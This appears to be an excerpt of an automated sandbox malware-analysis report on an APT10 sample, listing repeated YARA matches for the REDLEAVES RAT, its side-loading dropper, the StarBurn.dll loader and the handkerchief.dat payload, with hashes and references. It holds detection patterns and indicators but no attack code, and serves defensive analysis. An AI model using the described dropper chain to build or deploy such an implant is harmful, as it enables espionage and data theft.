Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_0043D32C OpenClipboard,GlobalAlloc,GlobalFix,EmptyClipboard,SetClipboardData,GlobalUnWire,1_2_0043D32C

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: cANdLlHS4N.exe, type: SAMPLEMatched rule: Detect a dropper used to deploy an implant via side loading. This dropper has specifically been observed deploying REDLEAVES & PlugX Author: USG
Source: 0.2.cANdLlHS4N.exe.ca8bf8.1.unpack, type: UNPACKEDPEMatched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT Author: USG
Source: 0.2.cANdLlHS4N.exe.ca8bf8.1.unpack, type: UNPACKEDPEMatched rule: Detects malware from Operation Cloud Hopper Author: Florian Roth
Source: 0.2.cANdLlHS4N.exe.26e0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT Author: USG
Source: 0.2.cANdLlHS4N.exe.26e0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects malware from Operation Cloud Hopper Author: Florian Roth
Source: 0.2.cANdLlHS4N.exe.26e0000.2.unpack, type: UNPACKEDPEMatched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT Author: USG
Source: 0.2.cANdLlHS4N.exe.26e0000.2.unpack, type: UNPACKEDPEMatched rule: Detects malware from Operation Cloud Hopper Author: Florian Roth
Source: 1.2.obedience.exe.6ed90000.1.unpack, type: UNPACKEDPEMatched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT Author: USG
Source: 1.2.obedience.exe.6ed90000.1.unpack, type: UNPACKEDPEMatched rule: Detects malware from Operation Cloud Hopper Author: Florian Roth
Source: 3.2.obedience.exe.6ee50000.1.unpack, type: UNPACKEDPEMatched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT Author: USG
Source: 3.2.obedience.exe.6ee50000.1.unpack, type: UNPACKEDPEMatched rule: Detects malware from Operation Cloud Hopper Author: Florian Roth
Source: 0.2.cANdLlHS4N.exe.ca8bf8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT Author: USG
Source: 0.2.cANdLlHS4N.exe.ca8bf8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detect obfuscated .dat file containing shellcode and core REDLEAVES RAT Author: USG
Source: 0.2.cANdLlHS4N.exe.9a0000.0.unpack, type: UNPACKEDPEMatched rule: Detect a dropper used to deploy an implant via side loading. This dropper has specifically been observed deploying REDLEAVES & PlugX Author: USG
Source: 0.2.cANdLlHS4N.exe.9a0000.0.unpack, type: UNPACKEDPEMatched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT Author: USG
Source: 0.2.cANdLlHS4N.exe.9a0000.0.unpack, type: UNPACKEDPEMatched rule: Detect obfuscated .dat file containing shellcode and core REDLEAVES RAT Author: USG
Source: 0.0.cANdLlHS4N.exe.9a0000.0.unpack, type: UNPACKEDPEMatched rule: Detect a dropper used to deploy an implant via side loading. This dropper has specifically been observed deploying REDLEAVES & PlugX Author: USG
Source: 00000000.00000002.246163618.0000000002710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detect obfuscated .dat file containing shellcode and core REDLEAVES RAT Author: USG
Source: 00000003.00000002.273655894.000000006EE51000.00000020.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT Author: USG
Source: 00000001.00000002.248376246.000000006ED91000.00000020.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT Author: USG
Source: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Strings identifying the core REDLEAVES RAT in its deobfuscated state Author: USG
Source: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Red Leaves malware, related to APT10 Author: David Cannings
Source: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: RedLeaf crypto function Author: kev
Source: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detect a dropper used to deploy an implant via side loading. This dropper has specifically been observed deploying REDLEAVES & PlugX Author: USG
Source: 00000002.00000000.244543247.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Strings identifying the core REDLEAVES RAT in its deobfuscated state Author: USG
Source: 00000002.00000000.244543247.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Red Leaves malware, related to APT10 Author: David Cannings
Source: 00000002.00000000.244543247.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: RedLeaf crypto function Author: kev
Source: 00000000.00000002.246143559.00000000026E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT Author: USG
Source: 00000000.00000002.246143559.00000000026E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects malware from Operation Cloud Hopper Author: Florian Roth
Source: 00000002.00000000.244858067.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Strings identifying the core REDLEAVES RAT in its deobfuscated state Author: USG
Source: 00000002.00000000.244858067.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Red Leaves malware, related to APT10 Author: David Cannings
Source: 00000002.00000000.244858067.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: RedLeaf crypto function Author: kev
Source: 00000000.00000000.235322946.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detect a dropper used to deploy an implant via side loading. This dropper has specifically been observed deploying REDLEAVES & PlugX Author: USG
Source: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Strings identifying the core REDLEAVES RAT in its deobfuscated state Author: USG
Source: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Red Leaves malware, related to APT10 Author: David Cannings
Source: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect RedLeaves in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detect a dropper used to deploy an implant via side loading. This dropper has specifically been observed deploying REDLEAVES & PlugX Author: USG
Source: 00000001.00000002.248128854.0000000002580000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Strings identifying the core REDLEAVES RAT in its deobfuscated state Author: USG
Source: 00000001.00000002.248128854.0000000002580000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Red Leaves malware, related to APT10 Author: David Cannings
Source: 00000001.00000002.248128854.0000000002580000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: RedLeaf crypto function Author: kev
Source: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT Author: USG
Source: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detect obfuscated .dat file containing shellcode and core REDLEAVES RAT Author: USG
Source: 00000003.00000002.273510822.0000000002410000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Strings identifying the core REDLEAVES RAT in its deobfuscated state Author: USG
Source: 00000003.00000002.273510822.0000000002410000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Red Leaves malware, related to APT10 Author: David Cannings
Source: 00000003.00000002.273510822.0000000002410000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: RedLeaf crypto function Author: kev
Source: 00000000.00000000.235102933.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detect a dropper used to deploy an implant via side loading. This dropper has specifically been observed deploying REDLEAVES & PlugX Author: USG
Source: Process Memory Space: cANdLlHS4N.exe PID: 6048, type: MEMORYSTRMatched rule: Detect a dropper used to deploy an implant via side loading. This dropper has specifically been observed deploying REDLEAVES & PlugX Author: USG
Source: Process Memory Space: cANdLlHS4N.exe PID: 6048, type: MEMORYSTRMatched rule: Detect obfuscated .dat file containing shellcode and core REDLEAVES RAT Author: USG
Source: Process Memory Space: obedience.exe PID: 488, type: MEMORYSTRMatched rule: Strings identifying the core REDLEAVES RAT in its deobfuscated state Author: USG
Source: Process Memory Space: obedience.exe PID: 488, type: MEMORYSTRMatched rule: Detects specific RedLeaves and PlugX binaries Author: US-CERT Code Analysis Team
Source: Process Memory Space: obedience.exe PID: 488, type: MEMORYSTRMatched rule: Red Leaves malware, related to APT10 Author: David Cannings
Source: Process Memory Space: iexplore.exe PID: 5844, type: MEMORYSTRMatched rule: Strings identifying the core REDLEAVES RAT in its deobfuscated state Author: USG
Source: Process Memory Space: iexplore.exe PID: 5844, type: MEMORYSTRMatched rule: Detects specific RedLeaves and PlugX binaries Author: US-CERT Code Analysis Team
Source: Process Memory Space: iexplore.exe PID: 5844, type: MEMORYSTRMatched rule: Red Leaves malware, related to APT10 Author: David Cannings
Source: Process Memory Space: obedience.exe PID: 5080, type: MEMORYSTRMatched rule: Strings identifying the core REDLEAVES RAT in its deobfuscated state Author: USG
Source: Process Memory Space: obedience.exe PID: 5080, type: MEMORYSTRMatched rule: Detects specific RedLeaves and PlugX binaries Author: US-CERT Code Analysis Team
Source: Process Memory Space: obedience.exe PID: 5080, type: MEMORYSTRMatched rule: Red Leaves malware, related to APT10 Author: David Cannings
Source: C:\Users\user\AppData\Local\Temp\handkerchief.dat, type: DROPPEDMatched rule: Detect obfuscated .dat file containing shellcode and core REDLEAVES RAT Author: USG
Source: C:\Users\user\AppData\Local\Temp\StarBurn.dll, type: DROPPEDMatched rule: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT Author: USG
Source: C:\Users\user\AppData\Local\Temp\StarBurn.dll, type: DROPPEDMatched rule: Detects malware from Operation Cloud Hopper Author: Florian Roth
Submitted sample is a known malware sample
Source: cANdLlHS4N.exeInitial file: MD5: b3139b26a2dabb9b6e728884d8fa8b33 Family: APT10 Alias: Stone Panda, APT 10, menuPass, happyyongzi, POTASSIUM, DustStorm, Red Apollo, CVNX, HOGFISH, APT10 Description: APT10 is the name given to a group of Chinese hackers first identified by FireEye. The group is said to have taken gigabytes of sensitive data from firms involved in the fields of aviation, space and satellite, manufacturing, pharmaceuticals, oil and gas exploration, communications, computer processor and maritime. References: https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.htmlData Source: https://github.com/RedDrip7/APT_Digital_Weapon
Source: cANdLlHS4N.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: cANdLlHS4N.exe, type: SAMPLEMatched rule: Dropper_DeploysMalwareViaSideLoading author = USG, description = Detect a dropper used to deploy an implant via side loading. This dropper has specifically been observed deploying REDLEAVES & PlugX, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 5262cb9791df50fafcb2fbd5f93226050b51efe400c2924eecba97b7ce437481: drops REDLEAVES. 6392e0701a77ea25354b1f40f5b867a35c0142abde785a66b83c9c8d2c14c0c3: drops plugx.
Source: 0.2.cANdLlHS4N.exe.ca8bf8.1.unpack, type: UNPACKEDPEMatched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
Source: 0.2.cANdLlHS4N.exe.ca8bf8.1.unpack, type: UNPACKEDPEMatched rule: OpCloudHopper_Malware_6 date = 2017-04-03, hash1 = aabebea87f211d47f72d662e2449009f83eac666d81b8629cf57219d0ce31af6, author = Florian Roth, description = Detects malware from Operation Cloud Hopper, reference = https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.cANdLlHS4N.exe.26e0000.2.raw.unpack, type: UNPACKEDPEMatched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
Source: 0.2.cANdLlHS4N.exe.26e0000.2.raw.unpack, type: UNPACKEDPEMatched rule: OpCloudHopper_Malware_6 date = 2017-04-03, hash1 = aabebea87f211d47f72d662e2449009f83eac666d81b8629cf57219d0ce31af6, author = Florian Roth, description = Detects malware from Operation Cloud Hopper, reference = https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.cANdLlHS4N.exe.26e0000.2.unpack, type: UNPACKEDPEMatched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
Source: 0.2.cANdLlHS4N.exe.26e0000.2.unpack, type: UNPACKEDPEMatched rule: OpCloudHopper_Malware_6 date = 2017-04-03, hash1 = aabebea87f211d47f72d662e2449009f83eac666d81b8629cf57219d0ce31af6, author = Florian Roth, description = Detects malware from Operation Cloud Hopper, reference = https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.obedience.exe.6ed90000.1.unpack, type: UNPACKEDPEMatched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
Source: 1.2.obedience.exe.6ed90000.1.unpack, type: UNPACKEDPEMatched rule: OpCloudHopper_Malware_6 date = 2017-04-03, hash1 = aabebea87f211d47f72d662e2449009f83eac666d81b8629cf57219d0ce31af6, author = Florian Roth, description = Detects malware from Operation Cloud Hopper, reference = https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.obedience.exe.6ee50000.1.unpack, type: UNPACKEDPEMatched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
Source: 3.2.obedience.exe.6ee50000.1.unpack, type: UNPACKEDPEMatched rule: OpCloudHopper_Malware_6 date = 2017-04-03, hash1 = aabebea87f211d47f72d662e2449009f83eac666d81b8629cf57219d0ce31af6, author = Florian Roth, description = Detects malware from Operation Cloud Hopper, reference = https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.cANdLlHS4N.exe.ca8bf8.1.raw.unpack, type: UNPACKEDPEMatched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
Source: 0.2.cANdLlHS4N.exe.ca8bf8.1.raw.unpack, type: UNPACKEDPEMatched rule: REDLEAVES_DroppedFile_ObfuscatedShellcodeAndRAT_handkerchief author = USG, description = Detect obfuscated .dat file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = fb0c714cd2ebdcc6f33817abe7813c36
Source: 0.2.cANdLlHS4N.exe.9a0000.0.unpack, type: UNPACKEDPEMatched rule: Dropper_DeploysMalwareViaSideLoading author = USG, description = Detect a dropper used to deploy an implant via side loading. This dropper has specifically been observed deploying REDLEAVES & PlugX, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 5262cb9791df50fafcb2fbd5f93226050b51efe400c2924eecba97b7ce437481: drops REDLEAVES. 6392e0701a77ea25354b1f40f5b867a35c0142abde785a66b83c9c8d2c14c0c3: drops plugx.
Source: 0.2.cANdLlHS4N.exe.9a0000.0.unpack, type: UNPACKEDPEMatched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
Source: 0.2.cANdLlHS4N.exe.9a0000.0.unpack, type: UNPACKEDPEMatched rule: REDLEAVES_DroppedFile_ObfuscatedShellcodeAndRAT_handkerchief author = USG, description = Detect obfuscated .dat file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = fb0c714cd2ebdcc6f33817abe7813c36
Source: 0.0.cANdLlHS4N.exe.9a0000.0.unpack, type: UNPACKEDPEMatched rule: Dropper_DeploysMalwareViaSideLoading author = USG, description = Detect a dropper used to deploy an implant via side loading. This dropper has specifically been observed deploying REDLEAVES & PlugX, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 5262cb9791df50fafcb2fbd5f93226050b51efe400c2924eecba97b7ce437481: drops REDLEAVES. 6392e0701a77ea25354b1f40f5b867a35c0142abde785a66b83c9c8d2c14c0c3: drops plugx.
Source: 00000000.00000002.246163618.0000000002710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: REDLEAVES_DroppedFile_ObfuscatedShellcodeAndRAT_handkerchief author = USG, description = Detect obfuscated .dat file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = fb0c714cd2ebdcc6f33817abe7813c36
Source: 00000000.00000002.246163618.0000000002710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000003.00000002.273655894.000000006EE51000.00000020.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
Source: 00000001.00000002.248376246.000000006ED91000.00000020.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
Source: 00000000.00000000.235573187.0000000000CA2000.00000008.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REDLEAVES_CoreImplant_UniqueStrings author = USG, description = Strings identifying the core REDLEAVES RAT in its deobfuscated state, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A
Source: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: malware_red_leaves_generic sha256 = 2e1f902de32b999642bb09e995082c37a024f320c683848edadaf2db8e322c3c, author = David Cannings, description = Red Leaves malware, related to APT10
Source: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: RedLeaf author = kev, description = RedLeaf crypto function, cape_type = RedLeaf Payload
Source: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Dropper_DeploysMalwareViaSideLoading author = USG, description = Detect a dropper used to deploy an implant via side loading. This dropper has specifically been observed deploying REDLEAVES & PlugX, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 5262cb9791df50fafcb2fbd5f93226050b51efe400c2924eecba97b7ce437481: drops REDLEAVES. 6392e0701a77ea25354b1f40f5b867a35c0142abde785a66b83c9c8d2c14c0c3: drops plugx.
Source: 00000002.00000000.244543247.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REDLEAVES_CoreImplant_UniqueStrings author = USG, description = Strings identifying the core REDLEAVES RAT in its deobfuscated state, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A
Source: 00000002.00000000.244543247.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: malware_red_leaves_generic sha256 = 2e1f902de32b999642bb09e995082c37a024f320c683848edadaf2db8e322c3c, author = David Cannings, description = Red Leaves malware, related to APT10
Source: 00000002.00000000.244543247.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: RedLeaf author = kev, description = RedLeaf crypto function, cape_type = RedLeaf Payload
Source: 00000000.00000002.246143559.00000000026E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
Source: 00000000.00000002.246143559.00000000026E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: OpCloudHopper_Malware_6 date = 2017-04-03, hash1 = aabebea87f211d47f72d662e2449009f83eac666d81b8629cf57219d0ce31af6, author = Florian Roth, description = Detects malware from Operation Cloud Hopper, reference = https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000002.00000000.244858067.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REDLEAVES_CoreImplant_UniqueStrings author = USG, description = Strings identifying the core REDLEAVES RAT in its deobfuscated state, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A
Source: 00000002.00000000.244858067.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: malware_red_leaves_generic sha256 = 2e1f902de32b999642bb09e995082c37a024f320c683848edadaf2db8e322c3c, author = David Cannings, description = Red Leaves malware, related to APT10
Source: 00000002.00000000.244858067.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: RedLeaf author = kev, description = RedLeaf crypto function, cape_type = RedLeaf Payload
Source: 00000000.00000000.235322946.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Dropper_DeploysMalwareViaSideLoading author = USG, description = Detect a dropper used to deploy an implant via side loading. This dropper has specifically been observed deploying REDLEAVES & PlugX, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 5262cb9791df50fafcb2fbd5f93226050b51efe400c2924eecba97b7ce437481: drops REDLEAVES. 6392e0701a77ea25354b1f40f5b867a35c0142abde785a66b83c9c8d2c14c0c3: drops plugx.
Source: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: REDLEAVES_CoreImplant_UniqueStrings author = USG, description = Strings identifying the core REDLEAVES RAT in its deobfuscated state, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A
Source: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: malware_red_leaves_generic sha256 = 2e1f902de32b999642bb09e995082c37a024f320c683848edadaf2db8e322c3c, author = David Cannings, description = Red Leaves malware, related to APT10
Source: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: RedLeaves hash1 = 5262cb9791df50fafcb2fbd5f93226050b51efe400c2924eecba97b7ce437481, author = JPCERT/CC Incident Response Group, description = detect RedLeaves in memory, rule_usage = memory block scan, reference = https://blogs.jpcert.or.jp/en/2017/05/volatility-plugin-for-detecting-redleaves-malware.html
Source: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Dropper_DeploysMalwareViaSideLoading author = USG, description = Detect a dropper used to deploy an implant via side loading. This dropper has specifically been observed deploying REDLEAVES & PlugX, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 5262cb9791df50fafcb2fbd5f93226050b51efe400c2924eecba97b7ce437481: drops REDLEAVES. 6392e0701a77ea25354b1f40f5b867a35c0142abde785a66b83c9c8d2c14c0c3: drops plugx.
Source: 00000001.00000002.248128854.0000000002580000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: REDLEAVES_CoreImplant_UniqueStrings author = USG, description = Strings identifying the core REDLEAVES RAT in its deobfuscated state, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A
Source: 00000001.00000002.248128854.0000000002580000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: malware_red_leaves_generic sha256 = 2e1f902de32b999642bb09e995082c37a024f320c683848edadaf2db8e322c3c, author = David Cannings, description = Red Leaves malware, related to APT10
Source: 00000001.00000002.248128854.0000000002580000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: RedLeaf author = kev, description = RedLeaf crypto function, cape_type = RedLeaf Payload
Source: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
Source: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: REDLEAVES_DroppedFile_ObfuscatedShellcodeAndRAT_handkerchief author = USG, description = Detect obfuscated .dat file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = fb0c714cd2ebdcc6f33817abe7813c36
Source: 00000003.00000002.273510822.0000000002410000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: REDLEAVES_CoreImplant_UniqueStrings author = USG, description = Strings identifying the core REDLEAVES RAT in its deobfuscated state, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A
Source: 00000003.00000002.273510822.0000000002410000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: malware_red_leaves_generic sha256 = 2e1f902de32b999642bb09e995082c37a024f320c683848edadaf2db8e322c3c, author = David Cannings, description = Red Leaves malware, related to APT10
Source: 00000003.00000002.273510822.0000000002410000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: RedLeaf author = kev, description = RedLeaf crypto function, cape_type = RedLeaf Payload
Source: 00000000.00000000.235102933.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Dropper_DeploysMalwareViaSideLoading author = USG, description = Detect a dropper used to deploy an implant via side loading. This dropper has specifically been observed deploying REDLEAVES & PlugX, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 5262cb9791df50fafcb2fbd5f93226050b51efe400c2924eecba97b7ce437481: drops REDLEAVES. 6392e0701a77ea25354b1f40f5b867a35c0142abde785a66b83c9c8d2c14c0c3: drops plugx.
Source: Process Memory Space: cANdLlHS4N.exe PID: 6048, type: MEMORYSTRMatched rule: Dropper_DeploysMalwareViaSideLoading author = USG, description = Detect a dropper used to deploy an implant via side loading. This dropper has specifically been observed deploying REDLEAVES & PlugX, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 5262cb9791df50fafcb2fbd5f93226050b51efe400c2924eecba97b7ce437481: drops REDLEAVES. 6392e0701a77ea25354b1f40f5b867a35c0142abde785a66b83c9c8d2c14c0c3: drops plugx.
Source: Process Memory Space: cANdLlHS4N.exe PID: 6048, type: MEMORYSTRMatched rule: REDLEAVES_DroppedFile_ObfuscatedShellcodeAndRAT_handkerchief author = USG, description = Detect obfuscated .dat file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = fb0c714cd2ebdcc6f33817abe7813c36
